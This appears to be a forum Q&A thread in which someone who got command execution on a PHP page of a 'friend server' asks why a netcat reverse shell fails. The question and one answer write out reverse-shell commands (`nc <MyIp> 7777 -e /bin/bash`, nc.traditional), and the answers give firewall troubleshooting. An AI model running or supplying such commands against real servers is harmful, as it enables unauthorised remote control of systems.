# Pentest - Cannot make reverse shell

Tags: php, bash, shell, netcat

I'm making a pentest to a friend server and I successfully write `system()` on a php page of the server then I try to make a reverse shell to my terminal.

I user NetCat to start listening my 7777 port `nc -vlnp 7777`
And checked if NetCat was installed and yes.

So send command to php `nc <MyIp> 7777 -e /bin/bash` to connect to my terminal
Yap don't worked, simply don't connect and yes a opened the port on my router.

Anyone have a idea the why?

Comment: Some kind of rule on the firewall...

Comment: I think this should be asked on https://security.stackexchange.com/

Comment: @lauda Ok, thanks!

Comment: Use nscan and see if the port is actually seen as open from the remote machine/server

Answer (score 2):

Could be multiple reasons.

First in mind is **firewall blocking your outbound connexion** on the compromised host.

Second is that **netcat doesn't always support the `-e` parameter**. If possible, install the netcat package `apt-get install netcat` and use `nc.traditional <your IP> -e /bin/bash`

Good luck !

Answer (score 1):

It is because of firewalls. Try to disable windows firewall.
It uses host based firewall, so any incoming connection  to Windows would be accept only if Windows machine had initiated the connection. It is based on  dynamic state packet filtering principal . It remembers  the  it packet it has sent and accepts any connection related to it. 
Same with Linux. Iptables configuration. 
Iptables - L 
Make sure your firewall doesn't block port 7777. Use following command 
Iptables - A Input  - i eth0 - p tcp - - destination-port 7777 - j Accept 
It is server trying to connect to your pc and Linux firewall blocking it. 
Again if you and your server is in different networks, then routers have network firewalls that block any incoming connections unless forwarding is enabled.